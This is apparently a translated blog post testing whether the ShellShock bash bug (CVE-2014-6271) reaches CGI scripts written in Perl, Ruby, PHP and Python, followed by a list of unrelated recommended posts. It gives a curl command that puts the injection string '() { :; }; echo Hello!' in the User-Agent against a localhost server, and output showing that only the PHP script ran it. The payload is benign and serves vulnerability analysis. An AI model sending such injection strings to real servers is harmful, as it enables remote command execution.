[PYTHON] Maybe I overestimated the impact of ShellShock on CGI

Due to a bash vulnerability (CVE-2014-6271 etc.), when a program language function that executes OS commands such as the system function from Perl or Ruby CGI is used, the data sent from the browser such as UserAgent becomes an environment variable. It's been talked about that bash starts in the stored state and ShellShock occurs, but is that really the case?

Experiment

Experiments were performed with the following processing system.

code

CGI that just calls and displays the OS command ʻenv`.

Perl

#!/usr/bin/env perl

print "Content-Type: text/html;\n\n";
print system('env');

Ruby

#!/usr/bin/env ruby

print "Content-Type: text/html;\n\n"
print system('env')

PHP

#!/usr/bin/env php

<?php
	print system('env');
?>

Python3

#!/usr/bin/env python3

import subprocess

print("Content-Type: text/html;\n")
print(subprocess.check_output('env'))

request

Requests are generated with curl. -A is an option to specify UserAgent.

$ curl -A '() { :; }; echo Hello!' localhost/index_xxx.cgi

result

All of them passed UserAgent as an environment variable, but ʻecho Hello!` Was executed only in PHP.

$ curl -A '() { :; }; echo Hello!' localhost/index_php.cgi
Hello!
SERVER_SIGNATURE=
SERVER_PORT=80
HTTP_HOST=localhost
DOCUMENT_ROOT=/Library/WebServer/Documents
SCRIPT_FILENAME=/Library/WebServer/Documents/index_php.cgi
REQUEST_URI=/index_php.cgi
SCRIPT_NAME=/index_php.cgi
__CF_USER_TEXT_ENCODING=0x46:0:0
REMOTE_PORT=50129
PATH=************
PWD=/Library/WebServer/Documents
[email protected]
HTTP_ACCEPT=*/*
REMOTE_ADDR=::1
SHLVL=1
SERVER_NAME=localhost
SERVER_SOFTWARE=Apache/2.2.26 (Unix) DAV/2 mod_ssl/2.2.26 OpenSSL/0.9.8za
QUERY_STRING=
SERVER_ADDR=::1
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
HTTP_USER_AGENT=() {  :
}
_=/usr/bin/env
_=/usr/bin/env%

why

First, Perl and Ruby use system calls to execute commands without going through the shell if there are no shell metacharacters in the command. In case of Python, if shell = True is not added, the shell will not be started. Since the shell does not start, it is not affected by ShellShock.

PHP seems to launch the shell as it is normally.

Conclusion

For programs other than PHP, even if you use a function that executes an OS command such as system, it seems that the shell is not always called. So even if you use a function like system, I don't think it's always affected by ShellShock.

Recommended Posts

Maybe I overestimated the impact of ShellShock on CGI
[Python] I wrote the route of the typhoon on the map using folium
I investigated the mechanism of flask-login!
I studied with Kaggle Start Book on the subject of kaggle [Part 1]
I checked the image of Science University on Twitter with Word2Vec.
I measured the run queue wait time of a process on Linux
I checked the contents of docker volume
I tried the asynchronous server of Django 3.0
I checked the options of copyMakeBorder of OpenCV
Investigate the effect of outliers on correlation
I summarized the folder structure of Flask
I stumbled on the Hatena Keyword API
Post the subject of Gmail on twitter
I didn't know the basics of Python
Display the graph of tensorBoard on jupyter
The Python project template I think of.
Change the order of PostgreSQL on Heroku
I read the implementation of golang channel
I want to use Python in the environment of pyenv + pipenv on Windows 10
I installed Pygame with Python 3.5.1 in the environment of pyenv on OS X
I played RPG Maker 2000 Ruina ~ The Story of the Abandoned City ~ on Raspberry Pi
I tried object detection with YOLO v3 (TensorFlow 2.1) on the GPU of windows!
I tried to rescue the data of the laptop by booting it on Ubuntu
I tried to display the infection condition of coronavirus on the heat map of seaborn
I tried the pivot table function of pandas
I tried cluster analysis of the weather map
I read the implementation of range (Objects / rangeobject.c)
I solved the deepest problem of Hiroshi Yuki.
The behavior of signal () depends on the compile options
[2020July] Check the UDID of the iPad on Linux
Use the latest version of PyCharm on Ubuntu
I checked the list of shortcut keys of Jupyter
I tried to touch the API of ebay
I tried to correct the keystone of the image
Try the free version of Progate [Python I]
I checked the session retention period of django
I checked the processing speed of numpy one-dimensionalization
I touched some of the new features of Python 3.8 ①
Calculate the probability of outliers on a boxplot
I ran the neural network on the actual FPGA
At the time of python update on ubuntu
Change the resolution of Ubuntu running on VirtualBox
I read and implemented the Variants of UKR
I want to customize the appearance of zabbix
I tried using the image filter of OpenCV
I tried playing with the calculator on tkinter
[AWS S3] Confirmation of the existence of folders on S3
I did a little research on the class
I tried to predict the price of ETF
I tried to vectorize the lyrics of Hinatazaka46!
[Example of Python improvement] I learned the basics of Python on a free site in 2 weeks.
I created the interface of hospital dashboard which shows clinical data on the web page.
I want to plot the location information of GTFS Realtime on Jupyter! (With balloon)
I want to take a screenshot of the site on Docker using any font
I tried to make it easy to change the setting of authenticated Proxy on Jupyter